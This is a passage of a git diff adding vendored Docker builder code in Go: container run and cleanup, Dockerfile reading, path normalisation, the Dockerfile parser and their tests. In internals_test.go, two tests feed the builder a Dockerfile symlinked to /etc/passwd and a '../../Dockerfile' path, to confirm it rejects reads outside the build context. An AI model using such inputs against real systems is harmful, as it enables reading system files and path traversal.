b.Stdout, b.Stderr, true) + }() + + finished := make(chan struct{}) + cancelErrCh := make(chan error, 1) + go func() { + select { + case <-b.clientCtx.Done(): + logrus.Debugln("Build cancelled, killing and removing container:", cID) + b.docker.ContainerKill(cID, 0) + b.removeContainer(cID) + cancelErrCh <- errCancelled + case <-finished: + cancelErrCh <- nil + } + }() + + if err := b.docker.ContainerStart(cID, nil, "", ""); err != nil { + close(finished) + if cancelErr := <-cancelErrCh; cancelErr != nil { + logrus.Debugf("Build cancelled (%v) and got an error from ContainerStart: %v", + cancelErr, err) + } + return err + } + + // Block on reading output from container, stop on err or chan closed + if err := <-errCh; err != nil { + close(finished) + if cancelErr := <-cancelErrCh; cancelErr != nil { + logrus.Debugf("Build cancelled (%v) and got an error from errCh: %v", + cancelErr, err) + } + return err + } + + if ret, _ := b.docker.ContainerWait(cID, -1); ret != 0 { + close(finished) + if cancelErr := <-cancelErrCh; cancelErr != nil { + logrus.Debugf("Build cancelled (%v) and got a non-zero code from ContainerWait: %d", + cancelErr, ret) + } + // TODO: change error type, because jsonmessage.JSONError assumes HTTP + return &jsonmessage.JSONError{ + Message: fmt.Sprintf("The command '%s' returned a non-zero code: %d", strings.Join(b.runConfig.Cmd, " "), ret), + Code: ret, + } + } + close(finished) + return <-cancelErrCh +} + +func (b *Builder) removeContainer(c string) error { + rmConfig := &types.ContainerRmConfig{ + ForceRemove: true, + RemoveVolume: true, + } + if err := b.docker.ContainerRm(c, rmConfig); err != nil { + fmt.Fprintf(b.Stdout, "Error removing intermediate container %s: %v\n", stringid.TruncateID(c), err) + return err + } + return nil +} + +func (b *Builder) clearTmp() { + for c := range b.tmpContainers { + if err := b.removeContainer(c); err != nil { + return + } + delete(b.tmpContainers, c) + fmt.Fprintf(b.Stdout, "Removing intermediate container %s\n", stringid.TruncateID(c)) + } +} + +// readDockerfile reads a Dockerfile from the current context. +func (b *Builder) readDockerfile() error { + // If no -f was specified then look for 'Dockerfile'. If we can't find + // that then look for 'dockerfile'. If neither are found then default + // back to 'Dockerfile' and use that in the error message. + if b.options.Dockerfile == "" { + b.options.Dockerfile = builder.DefaultDockerfileName + if _, _, err := b.context.Stat(b.options.Dockerfile); os.IsNotExist(err) { + lowercase := strings.ToLower(b.options.Dockerfile) + if _, _, err := b.context.Stat(lowercase); err == nil { + b.options.Dockerfile = lowercase + } + } + } + + err := b.parseDockerfile() + + if err != nil { + return err + } + + // After the Dockerfile has been parsed, we need to check the .dockerignore + // file for either "Dockerfile" or ".dockerignore", and if either are + // present then erase them from the build context. These files should never + // have been sent from the client but we did send them to make sure that + // we had the Dockerfile to actually parse, and then we also need the + // .dockerignore file to know whether either file should be removed. + // Note that this assumes the Dockerfile has been read into memory and + // is now safe to be removed. + if dockerIgnore, ok := b.context.(builder.DockerIgnoreContext); ok { + dockerIgnore.Process([]string{b.options.Dockerfile}) + } + return nil +} + +func (b *Builder) parseDockerfile() error { + f, err := b.context.Open(b.options.Dockerfile) + if err != nil { + if os.IsNotExist(err) { + return fmt.Errorf("Cannot locate specified Dockerfile: %s", b.options.Dockerfile) + } + return err + } + defer f.Close() + if f, ok := f.(*os.File); ok { + // ignoring error because Open already succeeded + fi, err := f.Stat() + if err != nil { + return fmt.Errorf("Unexpected error reading Dockerfile: %v", err) + } + if fi.Size() == 0 { + return fmt.Errorf("The Dockerfile (%s) cannot be empty", b.options.Dockerfile) + } + } + b.dockerfile, err = parser.Parse(f, &b.directive) + if err != nil { + return err + } + + return nil +} + +// determine if build arg is part of built-in args or user +// defined args in Dockerfile at any point in time. +func (b *Builder) isBuildArgAllowed(arg string) bool { + if _, ok := BuiltinAllowedBuildArgs[arg]; ok { + return true + } + if _, ok := b.allowedBuildArgs[arg]; ok { + return true + } + return false +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go new file mode 100644 index 0000000000..d170d8e25a --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go @@ -0,0 +1,95 @@ +package dockerfile + +import ( + "fmt" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/builder" + "github.com/docker/docker/pkg/archive" +) + +func TestEmptyDockerfile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test") + defer cleanup() + + createTestTempFile(t, contextDir, builder.DefaultDockerfileName, "", 0777) + + readAndCheckDockerfile(t, "emptyDockefile", contextDir, "", "The Dockerfile (Dockerfile) cannot be empty") +} + +func TestSymlinkDockerfile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test") + defer cleanup() + + createTestSymlink(t, contextDir, builder.DefaultDockerfileName, "/etc/passwd") + + // The reason the error is "Cannot locate specified Dockerfile" is because + // in the builder, the symlink is resolved within the context, therefore + // Dockerfile -> /etc/passwd becomes etc/passwd from the context which is + // a nonexistent file. + expectedError := fmt.Sprintf("Cannot locate specified Dockerfile: %s", builder.DefaultDockerfileName) + + readAndCheckDockerfile(t, "symlinkDockerfile", contextDir, builder.DefaultDockerfileName, expectedError) +} + +func TestDockerfileOutsideTheBuildContext(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test") + defer cleanup() + + expectedError := "Forbidden path outside the build context" + + readAndCheckDockerfile(t, "DockerfileOutsideTheBuildContext", contextDir, "../../Dockerfile", expectedError) +} + +func TestNonExistingDockerfile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test") + defer cleanup() + + expectedError := "Cannot locate specified Dockerfile: Dockerfile" + + readAndCheckDockerfile(t, "NonExistingDockerfile", contextDir, "Dockerfile", expectedError) +} + +func readAndCheckDockerfile(t *testing.T, testName, contextDir, dockerfilePath, expectedError string) { + tarStream, err := archive.Tar(contextDir, archive.Uncompressed) + + if err != nil { + t.Fatalf("Error when creating tar stream: %s", err) + } + + defer func() { + if err = tarStream.Close(); err != nil { + t.Fatalf("Error when closing tar stream: %s", err) + } + }() + + context, err := builder.MakeTarSumContext(tarStream) + + if err != nil { + t.Fatalf("Error when creating tar context: %s", err) + } + + defer func() { + if err = context.Close(); err != nil { + t.Fatalf("Error when closing tar context: %s", err) + } + }() + + options := &types.ImageBuildOptions{ + Dockerfile: dockerfilePath, + } + + b := &Builder{options: options, context: context} + + err = b.readDockerfile() + + if err == nil { + t.Fatalf("No error when executing test: %s", testName) + } + + if !strings.Contains(err.Error(), expectedError) { + t.Fatalf("Wrong error message. Should be \"%s\". Got \"%s\"", expectedError, err.Error()) + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go new file mode 100644 index 0000000000..a8a47c3582 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go @@ -0,0 +1,38 @@ +// +build !windows + +package dockerfile + +import ( + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/system" +) + +// normaliseDest normalises the destination of a COPY/ADD command in a +// platform semantically consistent way. +func normaliseDest(cmdName, workingDir, requested string) (string, error) { + dest := filepath.FromSlash(requested) + endsInSlash := strings.HasSuffix(requested, string(os.PathSeparator)) + if !system.IsAbs(requested) { + dest = filepath.Join(string(os.PathSeparator), filepath.FromSlash(workingDir), dest) + // Make sure we preserve any trailing slash + if endsInSlash { + dest += string(os.PathSeparator) + } + } + return dest, nil +} + +func containsWildcards(name string) bool { + for i := 0; i < len(name); i++ { + ch := name[i] + if ch == '\\' { + i++ + } else if ch == '*' || ch == '?' || ch == '[' { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go new file mode 100644 index 0000000000..f60b112049 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go @@ -0,0 +1,66 @@ +package dockerfile + +import ( + "fmt" + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/system" +) + +// normaliseDest normalises the destination of a COPY/ADD command in a +// platform semantically consistent way. +func normaliseDest(cmdName, workingDir, requested string) (string, error) { + dest := filepath.FromSlash(requested) + endsInSlash := strings.HasSuffix(dest, string(os.PathSeparator)) + + // We are guaranteed that the working directory is already consistent, + // However, Windows also has, for now, the limitation that ADD/COPY can + // only be done to the system drive, not any drives that might be present + // as a result of a bind mount. + // + // So... if the path requested is Linux-style absolute (/foo or \\foo), + // we assume it is the system drive. If it is a Windows-style absolute + // (DRIVE:\\foo), error if DRIVE is not C. And finally, ensure we + // strip any configured working directories drive letter so that it + // can be subsequently legitimately converted to a Windows volume-style + // pathname. + + // Not a typo - filepath.IsAbs, not system.IsAbs on this next check as + // we only want to validate where the DriveColon part has been supplied. + if filepath.IsAbs(dest) { + if strings.ToUpper(string(dest[0])) != "C" { + return "", fmt.Errorf("Windows does not support %s with a destinations not on the system drive (C:)", cmdName) + } + dest = dest[2:] // Strip the drive letter + } + + // Cannot handle relative where WorkingDir is not the system drive. + if len(workingDir) > 0 { + if ((len(workingDir) > 1) && !system.IsAbs(workingDir[2:])) || (len(workingDir) == 1) { + return "", fmt.Errorf("Current WorkingDir %s is not platform consistent", workingDir) + } + if !system.IsAbs(dest) { + if string(workingDir[0]) != "C" { + return "", fmt.Errorf("Windows does not support %s with relative paths when WORKDIR is not the system drive", cmdName) + } + dest = filepath.Join(string(os.PathSeparator), workingDir[2:], dest) + // Make sure we preserve any trailing slash + if endsInSlash { + dest += string(os.PathSeparator) + } + } + } + return dest, nil +} + +func containsWildcards(name string) bool { + for i := 0; i < len(name); i++ { + ch := name[i] + if ch == '*' || ch == '?' || ch == '[' { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go new file mode 100644 index 0000000000..868a6671a3 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go @@ -0,0 +1,51 @@ +// +build windows + +package dockerfile + +import "testing" + +func TestNormaliseDest(t *testing.T) { + tests := []struct{ current, requested, expected, etext string }{ + {``, `D:\`, ``, `Windows does not support TEST with a destinations not on the system drive (C:)`}, + {``, `e:/`, ``, `Windows does not support TEST with a destinations not on the system drive (C:)`}, + {`invalid`, `./c1`, ``, `Current WorkingDir invalid is not platform consistent`}, + {`C:`, ``, ``, `Current WorkingDir C: is not platform consistent`}, + {`C`, ``, ``, `Current WorkingDir C is not platform consistent`}, + {`D:\`, `.`, ``, "Windows does not support TEST with relative paths when WORKDIR is not the system drive"}, + {``, `D`, `D`, ``}, + {``, `./a1`, `.\a1`, ``}, + {``, `.\b1`, `.\b1`, ``}, + {``, `/`, `\`, ``}, + {``, `\`, `\`, ``}, + {``, `c:/`, `\`, ``}, + {``, `c:\`, `\`, ``}, + {``, `.`, `.`, ``}, + {`C:\wdd`, `./a1`, `\wdd\a1`, ``}, + {`C:\wde`, `.\b1`, `\wde\b1`, ``}, + {`C:\wdf`, `/`, `\`, ``}, + {`C:\wdg`, `\`, `\`, ``}, + {`C:\wdh`, `c:/`, `\`, ``}, + {`C:\wdi`, `c:\`, `\`, ``}, + {`C:\wdj`, `.`, `\wdj`, ``}, + {`C:\wdk`, `foo/bar`, `\wdk\foo\bar`, ``}, + {`C:\wdl`, `foo\bar`, `\wdl\foo\bar`, ``}, + {`C:\wdm`, `foo/bar/`, `\wdm\foo\bar\`, ``}, + {`C:\wdn`, `foo\bar/`, `\wdn\foo\bar\`, ``}, + } + for _, i := range tests { + got, err := normaliseDest("TEST", i.current, i.requested) + if err != nil && i.etext == "" { + t.Fatalf("TestNormaliseDest Got unexpected error %q for %s %s. ", err.Error(), i.current, i.requested) + } + if i.etext != "" && ((err == nil) || (err != nil && err.Error() != i.etext)) { + if err == nil { + t.Fatalf("TestNormaliseDest Expected an error for %s %s but didn't get one", i.current, i.requested) + } else { + t.Fatalf("TestNormaliseDest Wrong error text for %s %s - %s", i.current, i.requested, err.Error()) + } + } + if i.etext == "" && got != i.expected { + t.Fatalf("TestNormaliseDest Expected %q for %q and %q. Got %q", i.expected, i.current, i.requested, got) + } + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go new file mode 100644 index 0000000000..fff3046fd3 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go @@ -0,0 +1,36 @@ +package main + +import ( + "fmt" + "os" + + "github.com/docker/docker/builder/dockerfile/parser" +) + +func main() { + var f *os.File + var err error + + if len(os.Args) < 2 { + fmt.Println("please supply filename(s)") + os.Exit(1) + } + + for _, fn := range os.Args[1:] { + f, err = os.Open(fn) + if err != nil { + panic(err) + } + defer f.Close() + + d := parser.Directive{LookingForDirectives: true} + parser.SetEscapeToken(parser.DefaultEscapeToken, &d) + + ast, err := parser.Parse(f, &d) + if err != nil { + panic(err) + } else { + fmt.Println(ast.Dump()) + } + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go new file mode 100644 index 0000000000..60d74d9c36 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go @@ -0,0 +1,61 @@ +package parser + +import ( + "testing" +) + +var invalidJSONArraysOfStrings = []string{ + `["a",42,"b"]`, + `["a",123.456,"b"]`, + `["a",{},"b"]`, + `["a",{"c": "d"},"b"]`, + `["a",["c"],"b"]`, + `["a",true,"b"]`, + `["a",false,"b"]`, + `["a",null,"b"]`, +} + +var validJSONArraysOfStrings = map[string][]string{ + `[]`: {}, + `[""]`: {""}, + `["a"]`: {"a"}, + `["a","b"]`: {"a", "b"}, + `[ "a", "b" ]`: {"a", "b"}, + `[ "a", "b" ]`: {"a", "b"}, + ` [ "a", "b" ] `: {"a", "b"}, + `["abc 123", "♥", "☃", "\" \\ \/ \b \f \n \r \t \u0000"]`: {"abc 123", "♥", "☃", "\" \\ / \b \f \n \r \t \u0000"}, +} + +func TestJSONArraysOfStrings(t *testing.T) { + for json, expected := range validJSONArraysOfStrings { + d := Directive{} + SetEscapeToken(DefaultEscapeToken, &d) + + if node, _, err := parseJSON(json, &d); err != nil { + t.Fatalf("%q should be a valid JSON array of strings, but wasn't! (err: %q)", json, err) + } else { + i := 0 + for node != nil { + if i >= len(expected) { + t.Fatalf("expected result is shorter than parsed result (%d vs %d+) in %q", len(expected), i+1, json) + } + if node.Value != expected[i] { + t.Fatalf("expected %q (not %q) in %q at pos %d", expected[i], node.Value, json, i) + } + node = node.Next + i++ + } + if i != len(expected) { + t.Fatalf("expected result is longer than parsed result (%d vs %d) in %q", len(expected), i+1, json) + } + } + } + for _, json := range invalidJSONArraysOfStrings { + d := Directive{} + SetEscapeToken(DefaultEscapeToken, &d) + + if _, _, err := parseJSON(json, &d); err != errDockerfileNotStringArray { + t.Fatalf("%q should be an invalid JSON array of strings, but wasn't!", json) + } + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go new file mode 100644 index 0000000000..d2bf2b01b1 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go @@ -0,0 +1,361 @@ +package parser + +// line parsers are dispatch calls that parse a single unit of text into a +// Node object which contains the whole statement. Dockerfiles have varied +// (but not usually unique, see ONBUILD for a unique example) parsing rules +// per-command, and these unify the processing in a way that makes it +// manageable. + +import ( + "encoding/json" + "errors" + "fmt" + "strings" + "unicode" + "unicode/utf8" +) + +var ( + errDockerfileNotStringArray = errors.New("When using JSON array syntax, arrays must be comprised of strings only.") +) + +// ignore the current argument. This will still leave a command parsed, but +// will not incorporate the arguments into the ast. +func parseIgnore(rest string, d *Directive) (*Node, map[string]bool, error) { + return &Node{}, nil, nil +} + +// used for onbuild. Could potentially be used for anything that represents a +// statement with sub-statements. +// +// ONBUILD RUN foo bar -> (onbuild (run foo bar)) +// +func parseSubCommand(rest string, d *Directive) (*Node, map[string]bool, error) { + if rest == "" { + return nil, nil, nil + } + + _, child, err := ParseLine(rest, d, false) + if err != nil { + return nil, nil, err + } + + return &Node{Children: []*Node{child}}, nil, nil +} + +// helper to parse words (i.e space delimited or quoted strings) in a statement. +// The quotes are preserved as part of this function and they are stripped later +// as part of processWords(). +func parseWords(rest string, d *Directive) []string { + const ( + inSpaces = iota // looking for start of a word + inWord + inQuote + ) + + words := []string{} + phase := inSpaces + word := "" + quote := '\000' + blankOK := false + var ch rune + var chWidth int + + for pos := 0; pos <= len(rest); pos += chWidth { + if pos != len(rest) { + ch, chWidth = utf8.DecodeRuneInString(rest[pos:]) + } + + if phase == inSpaces { // Looking for start of word + if pos == len(rest) { // end of input + break + } + if unicode.IsSpace(ch) { // skip spaces + continue + } + phase = inWord // found it, fall through + } + if (phase == inWord || phase == inQuote) && (pos == len(rest)) { + if blankOK || len(word) > 0 { + words = append(words, word) + } + break + } + if phase == inWord { + if unicode.IsSpace(ch) { + phase = inSpaces + if blankOK || len(word) > 0 { + words = append(words, word) + } + word = "" + blankOK = false + continue + } + if ch == '\'' || ch == '"' { + quote = ch + blankOK = true + phase = inQuote + } + if ch == d.EscapeToken { + if pos+chWidth == len(rest) { + continue // just skip an escape token at end of line + } + // If we're not quoted and we see an escape token, then always just + // add the escape token plus the char to the word, even if the char + // is a quote. + word += string(ch) + pos += chWidth + ch, chWidth = utf8.DecodeRuneInString(rest[pos:]) + } + word += string(ch) + continue + } + if phase == inQuote { + if ch == quote { + phase = inWord + } + // The escape token is special except for ' quotes - can't escape anything for ' + if ch == d.EscapeToken && quote != '\'' { + if pos+chWidth == len(rest) { + phase = inWord + continue // just skip the escape token at end + } + pos += chWidth + word += string(ch) + ch, chWidth = utf8.DecodeRuneInString(rest[pos:]) + } + word += string(ch) + } + } + + return words +} + +// parse environment like statements. Note that this does *not* handle +// variable interpolation, which will be handled in the evaluator. +func parseNameVal(rest string, key string, d *Directive) (*Node, map[string]bool, error) { + // This is kind of tricky because we need to support the old + // variant: KEY name value + // as well as the new one: KEY name=value ... + // The trigger to know which one is being used will be whether we hit + // a space or = first. space ==> old, "=" ==> new + + words := parseWords(rest, d) + if len(words) == 0 { + return nil, nil, nil + } + + var rootnode *Node + + // Old format (KEY name value) + if !strings.Contains(words[0], "=") { + node := &Node{} + rootnode = node + strs := tokenWhitespace.Split(rest, 2) + + if len(strs) < 2 { + return nil, nil, fmt.Errorf(key + " must have two arguments") + } + + node.Value = strs[0] + node.Next = &Node{} + node.Next.Value = strs[1] + } else { + var prevNode *Node + for i, word := range words { + if !strings.Contains(word, "=") { + return nil, nil, fmt.Errorf("Syntax error - can't find = in %q. Must be of the form: name=value", word) + } + parts := strings.SplitN(word, "=", 2) + + name := &Node{} + value := &Node{} + + name.Next = value + name.Value = parts[0] + value.Value = parts[1] + + if i == 0 { + rootnode = name + } else { + prevNode.Next = name + } + prevNode = value + } + } + + return rootnode, nil, nil +} + +func parseEnv(rest string, d *Directive) (*Node, map[string]bool, error) { + return parseNameVal(rest, "ENV", d) +} + +func parseLabel(rest string, d *Directive) (*Node, map[string]bool, error) { + return parseNameVal(rest, "LABEL", d) +} + +// parses a statement containing one or more keyword definition(s) and/or +// value assignments, like `name1 name2= name3="" name4=value`. +// Note that this is a stricter format than the old format of assignment, +// allowed by parseNameVal(), in a way that this only allows assignment of the +// form `keyword=[]` like `name2=`, `name3=""`, and `name4=value` above. +// In addition, a keyword definition alone is of the form `keyword` like `name1` +// above. And the assignments `name2=` and `name3=""` are equivalent and +// assign an empty value to the respective keywords. +func parseNameOrNameVal(rest string, d *Directive) (*Node, map[string]bool, error) { + words := parseWords(rest, d) + if len(words) == 0 { + return nil, nil, nil + } + + var ( + rootnode *Node + prevNode *Node + ) + for i, word := range words { + node := &Node{} + node.Value = word + if i == 0 { + rootnode = node + } else { + prevNode.Next = node + } + prevNode = node + } + + return rootnode, nil, nil +} + +// parses a whitespace-delimited set of arguments. The result is effectively a +// linked list of string arguments. +func parseStringsWhitespaceDelimited(rest string, d *Directive) (*Node, map[string]bool, error) { + if rest == "" { + return nil, nil, nil + } + + node := &Node{} + rootnode := node + prevnode := node + for _, str := range tokenWhitespace.Split(rest, -1) { // use regexp + prevnode = node + node.Value = str + node.Next = &Node{} + node = node.Next + } + + // XXX to get around regexp.Split *always* providing an empty string at the + // end due to how our loop is constructed, nil out the last node in the + // chain. + prevnode.Next = nil + + return rootnode, nil, nil +} + +// parsestring just wraps the string in quotes and returns a working node. +func parseString(rest string, d *Directive) (*Node, map[string]bool, error) { + if rest == "" { + return nil, nil, nil + } + n := &Node{} + n.Value = rest + return n, nil, nil +} + +// parseJSON converts JSON arrays to an AST. +func parseJSON(rest string, d *Directive) (*Node, map[string]bool, error) { + rest = strings.TrimLeftFunc(rest, unicode.IsSpace) + if !strings.HasPrefix(rest, "[") { + return nil, nil, fmt.Errorf(`Error parsing "%s" as a JSON array`, rest) + } + + var myJSON []interface{} + if err := json.NewDecoder(strings.NewReader(rest)).Decode(&myJSON); err != nil { + return nil, nil, err + } + + var top, prev *Node + for _, str := range myJSON { + s, ok := str.(string) + if !ok { + return nil, nil, errDockerfileNotStringArray + } + + node := &Node{Value: s} + if prev == nil { + top = node + } else { + prev.Next = node + } + prev = node + } + + return top, map[string]bool{"json": true}, nil +} + +// parseMaybeJSON determines if the argument appears to be a JSON array. If +// so, passes to parseJSON; if not, quotes the result and returns a single +// node. +func parseMaybeJSON(rest string, d *Directive) (*Node, map[string]bool, error) { + if rest == "" { + return nil, nil, nil + } + + node, attrs, err := parseJSON(rest, d) + + if err == nil { + return node, attrs, nil + } + if err == errDockerfileNotStringArray { + return nil, nil, err + } + + node = &Node{} + node.Value = rest + return node, nil, nil +} + +// parseMaybeJSONToList determines if the argument appears to be a JSON array. If +// so, passes to parseJSON; if not, attempts to parse it as a whitespace +// delimited string. +func parseMaybeJSONToList(rest string, d *Directive) (*Node, map[string]bool, error) { + node, attrs, err := parseJSON(rest, d) + + if err == nil { + return node, attrs, nil + } + if err == errDockerfileNotStringArray { + return nil, nil, err + } + + return parseStringsWhitespaceDelimited(rest, d) +} + +// The HEALTHCHECK command is like parseMaybeJSON, but has an extra type argument. +func parseHealthConfig(rest string, d *Directive) (*Node, map[string]bool, error) { + // Find end of first argument + var sep int + for ; sep < len(rest); sep++ { + if unicode.IsSpace(rune(rest[sep])) { + break + } + } + next := sep + for ; next < len(rest); next++ { + if !unicode.IsSpace(rune(rest[next])) { + break + } + } + + if sep == 0 { + return nil, nil, nil + } + + typ := rest[:sep] + cmd, attrs, err := parseMaybeJSON(rest[next:], d) + if err != nil { + return nil, nil, err + } + + return &Node{Value: typ, Next: cmd}, attrs, err +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go new file mode 100644 index 0000000000..e534644491 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go @@ -0,0 +1,221 @@ +// Package parser implements a parser and parse tree dumper for Dockerfiles. +package parser + +import ( + "bufio" + "bytes" + "fmt" + "io" + "regexp" + "strings" + "unicode" + + "github.com/docker/docker/builder/dockerfile/command" +) + +// Node is a structure used to represent a parse tree. +// +// In the node there are three fields, Value, Next, and Children. Value is the +// current token's string value. Next is always the next non-child token, and +// children contains all the children. Here's an example: +// +// (value next (child child-next child-next-next) next-next) +// +// This data structure is frankly pretty lousy for handling complex languages, +// but lucky for us the Dockerfile isn't very complicated. This structure +// works a little more effectively than a "proper" parse tree for our needs. +// +type Node struct { + Value string // actual content + Next *Node // the next item in the current sexp + Children []*Node // the children of this sexp + Attributes map[string]bool // special attributes for this node + Original string // original line used before parsing + Flags []string // only top Node should have this set + StartLine int // the line in the original dockerfile where the node begins + EndLine int // the line in the original dockerfile where the node ends +} + +// Directive is the structure used during a build run to hold the state of +// parsing directives. +type Directive struct { + EscapeToken rune // Current escape token + LineContinuationRegex *regexp.Regexp // Current line contination regex + LookingForDirectives bool // Whether we are currently looking for directives + EscapeSeen bool // Whether the escape directive has been seen +} + +var ( + dispatch map[string]func(string, *Directive) (*Node, map[string]bool, error) + tokenWhitespace = regexp.MustCompile(`[\t\v\f\r ]+`) + tokenEscapeCommand = regexp.MustCompile(`^#[ \t]*escape[ \t]*=[ \t]*(?P.).*$`) + tokenComment = regexp.MustCompile(`^#.*$`) +) + +// DefaultEscapeToken is the default escape token +const DefaultEscapeToken = "\\" + +// SetEscapeToken sets the default token for escaping characters in a Dockerfile. +func SetEscapeToken(s string, d *Directive) error { + if s != "`" && s != "\\" { + return fmt.Errorf("invalid ESCAPE '%s'. Must be ` or \\", s) + } + d.EscapeToken = rune(s[0]) + d.LineContinuationRegex = regexp.MustCompile(`\` + s + `[ \t]*$`) + return nil +} + +func init() { + // Dispatch Table. see line_parsers.go for the parse functions. + // The command is parsed and mapped to the line parser. The line parser + // receives the arguments but not the command, and returns an AST after + // reformulating the arguments according to the rules in the parser + // functions. Errors are propagated up by Parse() and the resulting AST can + // be incorporated directly into the existing AST as a next. + dispatch = map[string]func(string, *Directive) (*Node, map[string]bool, error){ + command.Add: parseMaybeJSONToList, + command.Arg: parseNameOrNameVal, + command.Cmd: parseMaybeJSON, + command.Copy: parseMaybeJSONToList, + command.Entrypoint: parseMaybeJSON, + command.Env: parseEnv, + command.Expose: parseStringsWhitespaceDelimited, + command.From: parseString, + command.Healthcheck: parseHealthConfig, + command.Label: parseLabel, + command.Maintainer: parseString, + command.Onbuild: parseSubCommand, + command.Run: parseMaybeJSON, + command.Shell: parseMaybeJSON, + command.StopSignal: parseString, + command.User: parseString, + command.Volume: parseMaybeJSONToList, + command.Workdir: parseString, + } +} + +// ParseLine parses a line and returns the remainder. +func ParseLine(line string, d *Directive, ignoreCont bool) (string, *Node, error) { + // Handle the parser directive '# escape=. Parser directives must precede + // any builder instruction or other comments, and cannot be repeated. + if d.LookingForDirectives { + tecMatch := tokenEscapeCommand.FindStringSubmatch(strings.ToLower(line)) + if len(tecMatch) > 0 { + if d.EscapeSeen == true { + return "", nil, fmt.Errorf("only one escape parser directive can be used") + } + for i, n := range tokenEscapeCommand.SubexpNames() { + if n == "escapechar" { + if err := SetEscapeToken(tecMatch[i], d); err != nil { + return "", nil, err + } + d.EscapeSeen = true + return "", nil, nil + } + } + } + } + + d.LookingForDirectives = false + + if line = stripComments(line); line == "" { + return "", nil, nil + } + + if !ignoreCont && d.LineContinuationRegex.MatchString(line) { + line = d.LineContinuationRegex.ReplaceAllString(line, "") + return line, nil, nil + } + + cmd, flags, args, err := splitCommand(line) + if err != nil { + return "", nil, err + } + + node := &Node{} + node.Value = cmd + + sexp, attrs, err := fullDispatch(cmd, args, d) + if err != nil { + return "", nil, err + } + + node.Next = sexp + node.Attributes = attrs + node.Original = line + node.Flags = flags + + return "", node, nil +} + +// Parse is the main parse routine. +// It handles an io.ReadWriteCloser and returns the root of the AST. +func Parse(rwc io.Reader, d *Directive) (*Node, error) { + currentLine := 0 + root := &Node{} + root.StartLine = -1 + scanner := bufio.NewScanner(rwc) + + utf8bom := []byte{0xEF, 0xBB, 0xBF} + for scanner.Scan() { + scannedBytes := scanner.Bytes() + // We trim UTF8 BOM + if currentLine == 0 { + scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom) + } + scannedLine := strings.TrimLeftFunc(string(scannedBytes), unicode.IsSpace) + currentLine++ + line, child, err := ParseLine(scannedLine, d, false) + if err != nil { + return nil, err + } + startLine := currentLine + + if line != "" && child == nil { + for scanner.Scan() { + newline := scanner.Text() + currentLine++ + + if stripComments(strings.TrimSpace(newline)) == "" { + continue + } + + line, child, err = ParseLine(line+newline, d, false) + if err != nil { + return nil, err + } + + if child != nil { + break + } + } + if child == nil && line != "" { + // When we call ParseLine we'll pass in 'true' for + // the ignoreCont param if we're at the EOF. This will + // prevent the func from returning immediately w/o + // parsing the line thinking that there's more input + // to come. + + _, child, err = ParseLine(line, d, scanner.Err() == nil) + if err != nil { + return nil, err + } + } + } + + if child != nil { + // Update the line information for the current child. + child.StartLine = startLine + child.EndLine = currentLine + // Update the line information for the root. The starting line of the root is always the + // starting line of the first child and the ending line is the ending line of the last child. + if root.StartLine < 0 { + root.StartLine = currentLine + } + root.EndLine = currentLine + root.Children = append(root.Children, child) + } + } + + return root, nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go new file mode 100644 index 0000000000..e8e26961de --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go @@ -0,0 +1,173 @@ +package parser + +import ( + "bytes" + "fmt" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "testing" +) + +const testDir = "testfiles" +const negativeTestDir = "testfiles-negative" +const testFileLineInfo = "testfile-line/Dockerfile" + +func getDirs(t *testing.T, dir string) []string { + f, err := os.Open(dir) + if err != nil { + t.Fatal(err) + } + + defer f.Close() + + dirs, err := f.Readdirnames(0) + if err != nil { + t.Fatal(err) + } + + return dirs +} + +func TestTestNegative(t *testing.T) { + for _, dir := range getDirs(t, negativeTestDir) { + dockerfile := filepath.Join(negativeTestDir, dir, "Dockerfile") + + df, err := os.Open(dockerfile) + if err != nil { + t.Fatalf("Dockerfile missing for %s: %v", dir, err) + } + defer df.Close() + + d := Directive{LookingForDirectives: true} + SetEscapeToken(DefaultEscapeToken, &d) + _, err = Parse(df, &d) + if err == nil { + t.Fatalf("No error parsing broken dockerfile for %s", dir) + } + } +} + +func TestTestData(t *testing.T) { + for _, dir := range getDirs(t, 